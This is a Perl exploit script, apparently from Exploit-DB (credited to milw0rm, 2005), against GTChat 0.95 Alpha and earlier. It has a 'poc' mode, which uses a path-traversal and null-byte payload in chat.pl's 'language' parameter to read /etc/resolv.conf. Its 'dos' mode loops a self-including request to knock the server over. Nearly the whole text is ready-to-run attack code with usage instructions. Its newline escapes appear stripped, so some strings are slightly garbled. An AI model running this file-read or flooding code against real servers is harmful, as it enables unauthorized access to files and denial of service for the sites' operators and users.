https://www.exploit-db.com/exploits/1157

漏洞细节尚未披露

#!/usr/bin/perl  

 use LWP::Simple;
    
 if (@ARGV < 3) 
{ 
    print "nUsage: $0 [server] [path] [mode] [count for DoS]n"; 
    print "sever -  URL chatn"; 
    print "path  -  path to chat.pln"; 
    print "mode  -  poc or dos,n"; 
    print "                    poc - simple check without DoS and exit,n"; 
    print "                    dos - DoS, you must set count for requests in 4 argument.nn";
    exit (); 
}   
    $DoS      =     "dos";
    $POC      =     "poc"; 
    $server   =  $ARGV[0]; 
    $path     =  $ARGV[1]; 
    $mode     =  $ARGV[2]; 
    $count    =  $ARGV[3];
    print qq(
                                           ###################################
                                           # GTChat <= 0.95 Alpha remote DoS #
                                           #   tested on GTChat 0.95 Alpha   #
                                           # (c)oded by x97Rang 2005 RST/GHC #
                                           #    Respect: b1f, 1dt.w0lf, ed   #
                                           ################################### );
 if ($mode eq $POC)
{  
    print "nnTry read file /etc/resolv.conf, maybe remote system unix...n";
    $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);  
    $content = get "$URL";
 if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) 
{   print "File read successfully, remote system is *nix and $server are VULNERABLE!n"; exit(); }
 if ($content =~ /Fatal error/)
{ 
    print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:n"; 
    print "=== OUTPUT ===============================================================================n"; 
    print "n$contentn"; 
    print "=============================================================================== OUTPUT ===n";
    exit();
}
 else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)n"; }
}
 if ($mode eq $DoS)
{
 if (!($count)) { print "nNeed count for DoS requests, you don't set it, exit...n"; exit() }
    print "nSend $count DoS requests to $server...n";
   $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);
 for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
    print "Done, packets sended.n";
}

# milw0rm.com [2005-08-18]